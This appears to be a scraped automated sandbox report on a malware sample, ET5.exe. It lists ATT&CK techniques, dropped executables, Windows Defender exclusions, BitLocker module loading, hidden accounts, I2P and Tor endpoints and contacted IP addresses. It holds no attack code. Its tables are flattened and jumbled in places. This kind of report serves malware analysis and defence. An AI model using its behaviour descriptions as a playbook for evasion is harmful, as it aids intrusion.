Network Sniffing		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
Services File Permissions Weakness		1
Services File Permissions Weakness		1
File Deletion		Cached Domain Credentials24
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Masquerading		DCSync1
Network Share Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
Valid Accounts		Proc Filesystem121
Security Software Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
Access Token Manipulation		/etc/passwd and /etc/shadow21
Virtualization/Sandbox Evasion		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
Virtualization/Sandbox Evasion		Network Sniffing2
Process Discovery		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
Process Injection		Input Capture1
Application Window Discovery		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
Hidden Users		Keylogging1
System Owner/User Discovery		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
Services File Permissions Weakness		GUI Input Capture1
System Network Configuration Discovery		Replication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1570047 Sample: ET5.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 94 Antivirus detection for URL or domain 2->94 96 NDIS Filter Driver detected (likely used to intercept and sniff network traffic) 2->96 98 Contains functionality to hide user accounts 2->98 100 6 other signatures 2->100 8 main.exe 2->8         started        13 ET5.exe 3 2->13         started        15 ET5.exe 2->15         started        process3 dnsIp4 72 23.137.250.43 GTLAKESUS Reserved 8->72 74 102.130.123.16 xneeloZA South Africa 8->74 78 34 other IPs or domains 8->78 58 C:\Windows\Temp\ypqwg32t, PE32+ 8->58 dropped 60 C:\Windows\Temp\y8J74cEH, PE32+ 8->60 dropped 62 C:\Windows\Temp\rmcjgYnL, PE32+ 8->62 dropped 70 15 other files (13 malicious) 8->70 dropped 104 Contains functionality to hide user accounts 8->104 106 Found Tor onion address 8->106 76 45.202.33.26, 1128, 49704 ONL-HKOCEANNETWORKLIMITEDHK Seychelles 13->76 64 C:\...\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, PE32+ 13->64 dropped 66 C:\Users\...\hstmhco83f64lehv4q0wbzqj3o.exe, PE32+ 13->66 dropped 68 C:\Users\user\...\9pfntcc6fev7dp9x4dc.bat, DOS 13->68 dropped 17 cmd.exe 1 13->17         started        20 j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe 10 13->20         started        23 hstmhco83f64lehv4q0wbzqj3o.exe 3 13->23         started        file5 signatures6 process7 file8 80 Modifies Windows Defender protection settings 17->80 82 Adds a directory exclusion to Windows Defender 17->82 25 powershell.exe 23 17->25         started        28 powershell.exe 23 17->28         started        30 powershell.exe 21 17->30         started        32 conhost.exe 17->32         started        56 C:\Users\Public\...\main.exe, PE32+ 20->56 dropped 84 Contains functionality to hide user accounts 20->84 86 Machine Learning detection for dropped file 20->86 88 Found Tor onion address 20->88 34 taskkill.exe 1 20->34         started        36 sc.exe 1 20->36         started        38 sc.exe 20->38         started        40 4 other processes 20->40 90 Antivirus detection for dropped file 23->90 92 Multi AV Scanner detection for dropped file 23->92 signatures9 process10 signatures11 102 Loading BitLocker PowerShell Module 25->102 42 conhost.exe 34->42         started        44 conhost.exe 36->44         started        46 conhost.exe 38->46         started        48 conhost.exe 40->48         started        50 conhost.exe 40->50         started        52 conhost.exe 40->52         started        54 conhost.exe 40->54         started        process12

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe100%AviraTR/AVI.Agent.jibab
C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe100%Joe Sandbox ML
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe67%ReversingLabsWin64.Trojan.Generic
C:\Windows\Temp\erT926ze0%ReversingLabs
C:\Windows\Temp\gBXHuZY00%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://i2p.ghativega.in/0%Avira URL Cloudsafe
https://netdb.i2p2.no/100%Avira URL Cloudmalware
https://reseed-fr.i2pd.xyz/0%Avira URL Cloudsafe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/0%Avira URL Cloudsafe
https://reseed.i2p-projekt.de/0%Avira URL Cloudsafe
https://i2p.novg.net/0%Avira URL Cloudsafe
https://i2pseed.creativecowpat.net:8443/0%Avira URL Cloudsafe
http://www.steema.com/linkIn/TeeChartForXE20%Avira URL Cloudsafe
https://reseed.memcpy.io/0%Avira URL Cloudsafe
https://reseed.i2pgit.org/100%Avira URL Cloudmalware
http://127.0.0.1:81180%Avira URL Cloudsafe
https://reseed.diva.exchange/100%Avira URL Cloudmalware
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtxyz/0%Avira URL Cloudsafe
http://www.steema.com/linkIn/TeeChartForXE2UH0%Avira URL Cloudsafe
https://reseed-pl.i2pd.xyz/0%Avira URL Cloudsafe
http://identiguy.i2p/hosts.txt0%Avira URL Cloudsafe
http://www.steema.com/linkIn/TeeChartForXE2H0%Avira URL Cloudsafe
http://reg.i2p/hosts.txt0%Avira URL Cloudsafe
https://www2.mk16.de/0%Avira URL Cloudsafe
http://stats.i2p/cgi-bin/newhosts.txt0%Avira URL Cloudsafe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3C0%Avira URL Cloudsafe
https://legit-website.com/i2pseeds.su30%Avira URL Cloudsafe
https://i2p.mooo.com/netDb/0%Avira URL Cloudsafe
https://banana.incognet.io/0%Avira URL Cloudsafe
https://i2pd.readthedocs.io/en/latest/user-guide/configuration/0%Avira URL Cloudsafe
http://rus.i2p/hosts.txt0%Avira URL Cloudsafe
http://reg.i2p/hosts.txtySDD0%Avira URL Cloudsafe
https://reseed2.i2p.net/100%Avira URL Cloudmalware
https://reseed.stormycloud.org/0%Avira URL Cloudsafe
https://reseed.onion.im/0%Avira URL Cloudsafe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.steema.com/linkIn/TeeChartForXE2ET5.exefalse
  • Avira URL Cloud: safe
unknown
https://reseed-fr.i2pd.xyz/j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drtrue
  • Avira URL Cloud: safe
unknown
https://i2pseed.creativecowpat.net:8443/j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drtrue
  • Avira URL Cloud: safe
unknown
https://reseed.i2p-projekt.de/j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drfalse
  • Avira URL Cloud: safe
unknown
https://i2p.novg.net/j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drtrue
  • Avira URL Cloud: safe
unknown
https://netdb.i2p2.no/j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drfalse
  • Avira URL Cloud: malware
unknown
https://reseed.memcpy.io/j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drtrue
  • Avira URL Cloud: safe
unknown
https://i2p.ghativega.in/j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drtrue
  • Avira URL Cloud: safe
unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://reseed.i2pgit.org/j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drtrue
  • Avira URL Cloud: malware
unknown
https://www2.mk16.de/j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drtrue
  • Avira URL Cloud: safe
unknown
http://www.steema.com/linkIn/TeeChartForXE2HET5.exefalse
  • Avira URL Cloud: safe
unknown
http://reg.i2p/hosts.txtupdate.pkg.10.dr, gBXHuZY0.22.drfalse
  • Avira URL Cloud: safe
unknown
https://reseed-pl.i2pd.xyz/j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drtrue
  • Avira URL Cloud: safe
unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtxyz/main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://stats.i2p/cgi-bin/newhosts.txtj5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drfalse
  • Avira URL Cloud: safe
unknown
http://digitalbush.com/projects/masked-input-plugin/#license)ET5.exefalse
    		high
    http://127.0.0.1:8118j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://identiguy.i2p/hosts.txtj5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://www.steema.com/linkIn/TeeChartForXE2UHET5.exefalse
    • Avira URL Cloud: safe
    		unknown
    https://reseed.diva.exchange/j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drtrue
    • Avira URL Cloud: malware
    		unknown
    http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3Cmain.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://legit-website.com/i2pseeds.su3j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://reseed.onion.im/j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drtrue
    • Avira URL Cloud: safe
    		unknown
    https://i2p.mooo.com/netDb/j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://i2pd.readthedocs.io/en/latest/user-guide/configuration/j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://reseed.stormycloud.org/j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drtrue
    • Avira URL Cloud: safe
    		unknown
    https://reseed2.i2p.net/j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drtrue
    • Avira URL Cloud: malware
    		unknown
    http://reg.i2p/hosts.txtySDDmain.exe, 00000016.00000002.4536791919.000001B980F27000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://banana.incognet.io/j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drtrue
    • Avira URL Cloud: safe
    		unknown
    http://rus.i2p/hosts.txtj5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtupdate.pkg.10.dr, gBXHuZY0.22.drfalse
    • Avira URL Cloud: safe
    		unknown

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    2.178.163.167
    		unknownIran (ISLAMIC Republic Of)
    		12880DCI-ASIRfalse
    139.129.17.126
    		unknownChina
    		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
    45.141.101.45
    		unknownRussian Federation
    		48347MTW-ASRUfalse
    89.117.55.228
    		unknownLithuania
    		15419LRTC-ASLTfalse
    79.246.173.34
    		unknownGermany
    		3320DTAGInternetserviceprovideroperationsDEfalse
    174.2.11.191
    		unknownCanada
    		6327SHAWCAfalse
    101.184.38.180
    		unknownAustralia
    		1221ASN-TELSTRATelstraCorporationLtdAUfalse
    102.130.123.16
    		unknownSouth Africa
    		37153xneeloZAfalse
    23.137.250.43
    		unknownReserved
    		397614GTLAKESUStrue
    45.61.165.224
    		unknownUnited States
    		8100ASN-QUADRANET-GLOBALUSfalse
    146.70.87.105
    		unknownUnited Kingdom
    		2018TENET-1ZAfalse
    95.84.200.6
    		unknownRussian Federation
    		42610NCNET-ASRUfalse
    121.98.12.248
    		unknownNew Zealand
    		9790VOCUSGROUPNZVocusGroupNZfalse
    195.252.220.165
    		unknownGermany
    		61157PLUSSERVER-ASN1DEfalse
    135.181.195.240
    		unknownGermany
    		24940HETZNER-ASDEfalse
    65.191.158.5
    		unknownUnited States
    		11426TWC-11426-CAROLINASUSfalse
    5.187.75.159
    		unknownRussian Federation
    		44604SVYAZ-TELECOM-ASRUfalse
    73.195.118.76
    		unknownUnited States
    		7922COMCAST-7922USfalse
    66.130.28.102
    		unknownCanada
    		5769VIDEOTRONCAfalse
    62.163.0.34
    		unknownNetherlands
    		6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
    118.178.193.220
    		unknownChina
    		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
    45.144.234.105
    		unknownUnited Kingdom
    		44486SYNLINQsynlinqdeDEfalse
    103.39.221.193
    		unknownChina
    		4816CHINANET-IDC-GDChinaTelecomGroupCNfalse
    154.216.20.137
    		unknownSeychelles
    		135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
    95.216.185.165
    		unknownGermany
    		24940HETZNER-ASDEfalse
    122.18.238.134
    		unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
    45.8.159.106
    		unknownRussian Federation
    		49392ASBAXETNRUfalse
    72.221.27.46
    		unknownUnited States
    		22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
    94.63.209.161
    		unknownPortugal
    		12353VODAFONE-PTVodafonePortugalPTfalse
    209.126.85.115
    		unknownUnited States
    		6428CDMUSfalse
    130.185.251.21
    		unknownBulgaria
    		203380DAINTERNATIONALGROUPGBfalse
    178.208.86.162
    		unknownRussian Federation
    		48282VDSINA-ASRUfalse
    120.155.52.253
    		unknownAustralia
    		1221ASN-TELSTRATelstraCorporationLtdAUfalse
    45.202.33.26
    		unknownSeychelles
    		139086ONL-HKOCEANNETWORKLIMITEDHKfalse
    62.113.245.76
    		unknownGermany
    		47447TTMDEfalse
    2.24.224.185
    		unknownUnited Kingdom
    		12576EELtdGBfalse

    Private

    IP
    127.0.0.1

    General Information

    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1570047
    Start date and time:2024-12-06 14:18:43 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 11m 44s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:28
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:ET5.exe
    Detection:MAL
    Classification:mal100.troj.evad.winEXE@38/76@0/37
    EGA Information:
    • Successful, ratio: 60%
    HCA Information:Failed
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Override analysis time to 240000 for current running targets taking high CPU consumption

    Warnings

    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Execution Graph export aborted for target ET5.exe, PID 7092 because there are no executed function
    • Execution Graph export aborted for target j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, PID 6128 because it is empty
    • Not all processes where analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size exceeded maximum capacity and may have missing disassembly code.
    • Report size exceeded maximum capacity and may have missing network information.
    • Report size getting too big, too many NtCreateKey calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • VT rate limit hit for: ET5.exe

    Simulations

    Behavior and APIs

    TimeTypeDescription
    08:19:39API Interceptor271x Sleep call for process: ET5.exe modified
    08:19:40API Interceptor43x Sleep call for process: powershell.exe modified
    08:20:38API Interceptor3143792x Sleep call for process: main.exe modified

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    146.70.87.105https://view.monday.com/4695735308-1bc1d553c209c424d366f1c4a33116f0?r=use1Get hashmaliciousHTMLPhisherBrowse
      https://view.monday.com/4690221033-540df5172a83b99184ed7cfbfd759811?r=use1Get hashmaliciousHTMLPhisherBrowse
        130.185.251.21file.exeGet hashmaliciousVidarBrowse

          Domains

          No context

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          DCI-ASIRmpsl.elfGet hashmaliciousUnknownBrowse
          • 2.178.185.185
          main_arm.elfGet hashmaliciousMiraiBrowse
          • 89.219.67.159
          f5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
          • 2.177.40.206
          mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
          • 217.218.36.181
          la.bot.sparc.elfGet hashmaliciousMiraiBrowse
          • 217.218.164.20
          la.bot.arm7.elfGet hashmaliciousMiraiBrowse
          • 89.219.67.182
          la.bot.sh4.elfGet hashmaliciousUnknownBrowse
          • 5.74.155.115
          la.bot.arm7.elfGet hashmaliciousUnknownBrowse
          • 93.119.76.0
          loligang.mpsl.elfGet hashmaliciousMiraiBrowse
          • 195.181.10.204
          newtpp.exeGet hashmaliciousXmrigBrowse
          • 2.177.228.237
          CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdmain_sh4.elfGet hashmaliciousMiraiBrowse
          • 140.205.153.120
          32.exeGet hashmaliciousCobaltStrikeBrowse
          • 8.138.173.127
          32http.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
          • 8.138.173.127
          sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
          • 8.185.18.61
          powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
          • 8.166.54.185
          arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
          • 120.79.228.35
          mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
          • 60.205.234.218
          31#U544a.exeGet hashmaliciousCobaltStrikeBrowse
          • 118.31.219.225
          UhEi3Rge75.exeGet hashmaliciousUnknownBrowse
          • 123.60.37.61
          m68k.elfGet hashmaliciousMiraiBrowse
          • 8.152.225.233
          MTW-ASRUla.bot.powerpc.elfGet hashmaliciousUnknownBrowse
          • 193.124.107.252
          na.elfGet hashmaliciousUnknownBrowse
          • 193.124.64.114
          la.bot.mips.elfGet hashmaliciousUnknownBrowse
          • 193.124.64.126
          g082Q9DajU.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, PureLog StealerBrowse
          • 195.133.48.136
          file.exeGet hashmaliciousLummaC, Amadey, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
          • 195.133.48.136
          Set-up.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
          • 195.133.48.136
          SecuriteInfo.com.Win32.TrojanX-gen.12944.32631.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog StealerBrowse
          • 195.133.48.136
          https://t.co/Tmh47fiTWdGet hashmaliciousUnknownBrowse
          • 93.95.97.29
          PQ2AUndsdb.exeGet hashmaliciousAmadey, AsyncRAT, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
          • 195.133.48.136
          Set-up.exeGet hashmaliciousCryptbotBrowse
